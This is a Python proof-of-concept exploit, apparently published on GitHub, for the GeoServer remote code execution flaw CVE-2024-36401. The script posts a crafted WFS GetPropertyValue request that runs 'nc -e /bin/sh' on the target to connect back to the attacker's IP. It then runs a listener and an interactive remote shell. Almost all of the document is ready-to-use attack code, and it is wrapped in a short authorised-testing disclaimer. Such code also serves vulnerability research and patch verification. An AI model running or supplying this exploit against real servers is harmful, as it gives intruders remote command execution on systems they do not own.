README.md
Rendering markdown...
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
Author: x.com/MohamedNab1l
GitHub: https://github.com/bigb0x/CVE-2024-36401
About:
POC for CVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer. This POC is based on the security advisory by phith0n: https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
Note:
This POC will attempt to establish a reverse shell from vulnerable targets. It is aimed at Linux targets. You will need a machine with a publicly reachable IP address in order to run this POC. This technique assumes that nc is available on the remote target.
Usage:
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
Please feel free to contact me if you have any comments or suggestions.
Version: 1.0.3
References
https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
Disclaimer:
I like to create my own tools for fun, work and educational purposes only. I do not support or encourage hacking or unauthorized access to any system or network. Please use my tools responsibly and only on systems where you have clear permission to test.
"""
import requests
import argparse
import re
import os
import threading
import time
import socket
from urllib.parse import urlparse
import select
from urllib3.exceptions import InsecureRequestWarning
# Suppress urllib3's InsecureRequestWarning; this script sends its request
# with verify=False.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# ANSI color codes (escape sequences interpolated into printed messages;
# reset_color restores the terminal's default attributes).
light_gray_color = '\033[37;1m'
dimmed_gray_color = '\033[90m'
honey_yellow_color = '\033[38;5;214m'
dim_yellow_color = "\033[33;1m"
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
reset_color = '\033[0m'
# Directory name created at startup by create_log_dir().
LOG_DIR = "logs"
# THE_VERSION ="1.0.3"
def banner():
    """Print the colored ASCII-art banner and a short tool description."""
    print(f'''{honey_yellow_color}
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓┏┓┏┓┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┣┓┃┃┃┫┃
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗┛┗╋┗┛┻
-> {light_gray_color}POC for CVE-2024-36401. Will try to obtain a shell on linux targets.{reset_color}
{honey_yellow_color}-> {light_gray_color}By: x.com/mohamednab1l
{honey_yellow_color}-> {honey_yellow_color}Use this wisely.{reset_color}
''')
def print_message(level, message):
    """Print a timestamped, color-coded status line to stdout.

    Args:
        level: One of 'info', 'warning' or 'error'. Any other value is
            printed without a tag rather than being silently dropped.
        message: Text to print.
    """
    # Timestamps are rendered in UTC (time.gmtime()).
    current_time = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
    if level == 'info':
        print(f"{current_time} {green_color}[INFO]{reset_color} {message}")
    elif level == 'warning':
        # The 'warning' level is displayed with the "[VLUN]" tag.
        print(f"{current_time} {honey_yellow_color}[VLUN] {message} {reset_color}")
    elif level == 'error':
        print(f"{current_time} {red_color}[ERROR]{message}{reset_color} ")
    else:
        # Unknown level: still show the message instead of losing it.
        print(f"{current_time} {message}")
def create_log_dir():
    """Create the LOG_DIR directory if needed and report when it is created.

    The directory is created directly and an already-existing path is
    tolerated, which avoids the race between checking for the path and
    creating it.
    """
    try:
        os.makedirs(LOG_DIR)
    except FileExistsError:
        # Path already exists; nothing to create or report.
        return
    print_message('info', f"Log directory created: {LOG_DIR}")
def clean_host(url):
    """Return the host part of *url* with cosmetic prefixes/suffixes removed.

    The network location (``host[:port]``) reported by ``urlparse`` is used;
    when it is empty (for example, no scheme was supplied) the parsed path is
    used instead. A leading ``www.`` and a trailing ``/`` are then removed.
    """
    parts = urlparse(url)
    candidate = parts.netloc if parts.netloc else parts.path
    # One pass handles both trims: the anchors keep the two alternatives
    # from ever matching anywhere but the very start and the very end.
    return re.sub(r'^www\.|/$', '', candidate)
def send_poc_request(url, host, ip, port, type):
    """Send the proof-of-concept WFS request to the target and report the result.

    Args:
        url: Base URL of the target; "/geoserver/wfs" is appended to it.
        host: Value sent in the HTTP Host header.
        ip: Address interpolated into the request body.
        port: Port interpolated into the request body.
        type: Feature type name placed in the query's ``typeNames`` attribute
            (note: this parameter shadows the built-in ``type`` in this scope).

    Calls exit() when the response status is 401, 403 or 404. Request errors
    (requests.exceptions.RequestException) are printed and not re-raised.
    """
    full_url = f"{url}/geoserver/wfs"
    headers = {
        "Host": host,
        "Accept-Encoding": "gzip, deflate, br",
        "Accept": "*/*",
        "Accept-Language": "en-US;q=0.9,en;q=0.8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36",
        "Connection": "close",
        "Cache-Control": "max-age=0",
        "Content-Type": "application/xml",
    }
    # WFS 2.0.0 GetPropertyValue document; `type`, `ip` and `port` are
    # interpolated verbatim (no XML escaping is applied).
    custom_payload = f"""
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='{type}'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'nc -e /bin/sh {ip} {port}')</wfs:valueReference>
</wfs:GetPropertyValue>
"""
    try:
        # TLS certificate verification is disabled; the call gives up after 30 s.
        response = requests.post(full_url, headers=headers, data=custom_payload, timeout=30, verify=False)
        print_message('info', f"Response status code: {dim_yellow_color}{response.status_code}{reset_color}")
        if response.status_code in [401, 404, 403]:
            print_message('info', "Target is not vulnerable.")
            # exit() raises SystemExit in the calling thread.
            exit()
        else:
            print_message('info', "Request sent. Checking for incoming connections.")
    except requests.exceptions.RequestException as e:
        print_message('error', f"An error occurred: {e}")
        print_message('error', "Failed to send request!")
def receive_output(client_socket, timeout=5):
    """Collect text sent by the peer until the connection goes quiet.

    Reading stops when any of the following happens:
      * data has been received and no more arrives for ``timeout`` seconds;
      * nothing at all arrives for ``timeout * 2`` seconds;
      * the peer closes the connection or the socket reports an error.

    Args:
        client_socket: Connected socket to read from. It is switched to
            non-blocking mode as a side effect.
        timeout: Idle period in seconds (see above).

    Returns:
        Everything received, decoded as UTF-8 with undecodable bytes dropped
        and surrounding whitespace stripped; ``""`` if nothing was received.
    """
    chunks = []
    client_socket.setblocking(False)
    # monotonic() is immune to wall-clock adjustments while measuring idle time.
    last_activity = time.monotonic()
    while True:
        limit = timeout if chunks else timeout * 2
        remaining = limit - (time.monotonic() - last_activity)
        if remaining <= 0:
            break
        try:
            # Block in select() until data is ready instead of spinning on
            # recv() and burning CPU while the socket is idle.
            readable, _, _ = select.select([client_socket], [], [], remaining)
            if not readable:
                continue
            data = client_socket.recv(8192)
        except (BlockingIOError, InterruptedError):
            # Spurious wake-up; re-evaluate the deadline and wait again.
            continue
        except (OSError, ValueError):
            # Connection reset or socket already closed: nothing more to read.
            break
        if not data:
            # Empty read means the peer closed the connection.
            break
        chunks.append(data)
        last_activity = time.monotonic()
    # Decode once so multi-byte characters split across chunks stay intact.
    return b''.join(chunks).decode('utf-8', errors='ignore').strip()
def interactive_shell(client_socket):
    """Run a line-based command prompt over an already connected socket.

    Sends ``id`` once and prints whatever comes back, then loops: read a line
    from stdin, send it followed by a newline, wait one second, and print the
    text returned by receive_output(). Typing ``exit`` (any letter case) or any
    exception inside the loop ends the session.

    Args:
        client_socket: Connected socket; it is closed before this function
            finishes its normal path.

    This function does not return normally: it ends by calling exit().
    """
    print_message('warning', "Nice!, we got a remote shell! :)")
    client_socket.send(b"id\n")
    # Fixed pause before reading the reply.
    time.sleep(1)
    output = receive_output(client_socket)
    if output:
        print_message('warning', "Checking the output of 'id' command:")
        print(f"{output}")
    else:
        print("No output received from 'id' command.")
    print_message('warning', "Shell established!.")
    print_message('warning', "Type commands and press enter to send, or type 'exit' to end the session.")
    while True:
        try:
            command = input(f"{honey_yellow_color}shell> {reset_color}")
            if command.lower() == 'exit':
                break
            client_socket.send(command.encode() + b'\n')
            time.sleep(1)
            output = receive_output(client_socket)
            if output:
                print(output)
            else:
                print_message('warning', "No output received.")
        except Exception as e:
            # Any failure (including EOF on stdin) ends the session.
            print_message('error', f"Error in shell: {e}")
            break
    client_socket.close()
    print_message('info', "Shell connection closed.")
    # exit() raises SystemExit; NOTE(review): when called from the listener
    # thread this presumably ends only that thread - confirm.
    exit()
def listen(ip, port, stop_event):
    """Wait for an inbound TCP connection and hand it to interactive_shell().

    The listening socket polls with a one-second accept timeout so that
    ``stop_event`` is checked regularly. Setup failures (for example the port
    being in use) are reported through print_message instead of escaping as an
    unhandled exception, and the listening socket is always closed.

    Args:
        ip: Local address to bind to.
        port: Local TCP port to bind to.
        stop_event: threading.Event-like object; listening stops once it is set.
    """
    # The context manager closes the socket on every exit path, including a
    # failed bind()/listen() and SystemExit raised further down the call chain.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind((ip, port))
            s.settimeout(1)
            s.listen(1)
            print_message('info', f"Listening on {ip}:{port}...")
            while not stop_event.is_set():
                try:
                    client, (client_ip, client_port) = s.accept()
                    print_message('info', f"Received connection from: {client_ip}:{client_port}")
                    print_message('warning', "POC was successful!")
                    interactive_shell(client)
                except socket.timeout:
                    # No connection within the last second; re-check stop_event.
                    continue
        except Exception as e:
            print_message('error', f"An error occurred: {e}")
def main():
    """Parse the command line, start the listener thread and send the request.

    The listener runs in a daemon thread. After the request has been sent the
    main thread waits for that thread to finish; Ctrl-C interrupts the wait.
    On the way out the listener is asked to stop and given up to five seconds
    to do so.
    """
    banner()
    parser = argparse.ArgumentParser(description='POC for CVE-2024-36401')
    parser.add_argument('-u', required=True, help='Target, example https://target:8080')
    parser.add_argument('-ip', required=True, help='Your IP, example 192.168.1.1')
    # type=int lets argparse reject a non-numeric port with a usage message
    # instead of the script crashing later with a ValueError traceback.
    parser.add_argument('-port', required=True, type=int, help='Port, example 1337')
    parser.add_argument('-type', required=True, help='Type, example sf:archsites')
    args = parser.parse_args()
    url = args.u
    ip = args.ip
    port = args.port
    # Named type_name locally to avoid shadowing the built-in type().
    type_name = args.type
    host = clean_host(url)
    stop_event = threading.Event()
    listen_thread = threading.Thread(
        target=listen,
        args=(ip, port, stop_event),
        daemon=True,
    )
    listen_thread.start()
    # Give the listener a moment to start before the request is sent.
    time.sleep(1)
    try:
        # Send the POST request
        send_poc_request(url, host, ip, port, type_name)
        # Join in short slices so KeyboardInterrupt is handled promptly.
        while listen_thread.is_alive():
            listen_thread.join(1)
    except KeyboardInterrupt:
        print_message('info', "Keyboard interrupt received. Cleaning up...")
    finally:
        stop_event.set()
        # (should be quick now)
        listen_thread.join(timeout=5)
        if listen_thread.is_alive():
            print_message('warning', "Listen thread did not stop in time. It will be terminated.")
        print_message('info', "Script execution completed. Exiting...")
# Script entry point: create the log directory first, then run main().
if __name__ == "__main__":
    create_log_dir()
    main()